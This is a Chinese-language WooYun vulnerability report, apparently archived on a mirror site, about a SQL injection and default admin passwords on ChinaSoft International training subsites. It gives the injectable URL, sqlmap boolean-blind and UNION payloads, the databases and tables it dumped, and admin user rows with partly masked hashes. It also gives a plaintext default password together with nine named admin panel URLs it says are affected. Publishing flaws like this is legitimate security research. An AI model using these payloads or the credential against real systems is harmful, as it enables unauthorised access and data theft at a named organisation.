乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-02: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-08-16: 厂商已经主动忽略漏洞,细节向公众公开
中软国际某分站SQL注入获取数据库+全分站后台弱口令
1.SQL注入注入点:
http://cqetc.chinasofti.com/list.php?c=8
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: c Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: c=8' AND 2516=2516 AND 'arSC'='arSC Type: UNION query Title: MySQL UNION query (NULL) - 13 columns Payload: c=8' LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a696d713a,0x665265615a424154514a,0x3a6977733a), NULL, NULL, NULL#---
available databases [10]:[*] cdetc[*] cqetc[*] dedecmsv57gbksp1[*] information_schema[*] mysql[*] performance_schema[*] phpdisk[*] test[*] ultrax[*] xaetc
Database: cdetc[35 tables]+--------------------------------+| sql_module_advertisement || sql_module_class || sql_module_feedback || sql_module_guestbook || sql_module_guestbook_writeback || sql_module_link || sql_module_search_word || sql_module_switchimage || sql_module_tagindex || sql_module_template || sql_system_public_article || sql_system_public_class || sql_system_public_content || sql_system_public_custom || sql_system_public_download || sql_system_public_image || sql_system_public_job || sql_system_public_link || sql_system_public_nav || sql_system_public_nav_class || sql_system_public_photo || sql_system_public_product || sql_system_public_type || sql_user_admin || sql_user_admin_class || sql_website_bg_notice || sql_website_config || sql_website_diary_record || sql_website_file || sql_website_file_cache || sql_website_info || sql_website_info_type || sql_website_shortcut || sql_website_update || sql_website_word |+--------------------------------+
Database: cdetcTable: sql_user_admin[3 entries]+---------------+----------------------------------+| user | password |+---------------+----------------------------------+| administrator | f48f8*****************b4fee55ec5 || hxkj | f48f8*****************b4fee55ec5 || etc | 0ab44*****************8d6faab1b8 |+---------------+----------------------------------+
后台GET:
2.后台弱口令比较后发现其他分站后台均为同一系统,于是猜测administrator帐号密码为默认密码,弱口令:administrator administrator2018受影响分站:
http://xmetc.chinasofti.com/manage/http://xaetc.chinasofti.com/manage/http://wxetc.chinasofti.com/manage/http://tjetc.chinasofti.com/manage/http://syetc.chinasofti.com/manage/http://njetc.chinasofti.com/manage/http://dletc.chinasofti.com/manage/http://cqetc.chinasofti.com/manage/http://cdetc.chinasofti.com/manage/
同上
你们懂~
未能联系到厂商或者厂商积极拒绝
漏洞Rank:8 (WooYun评价)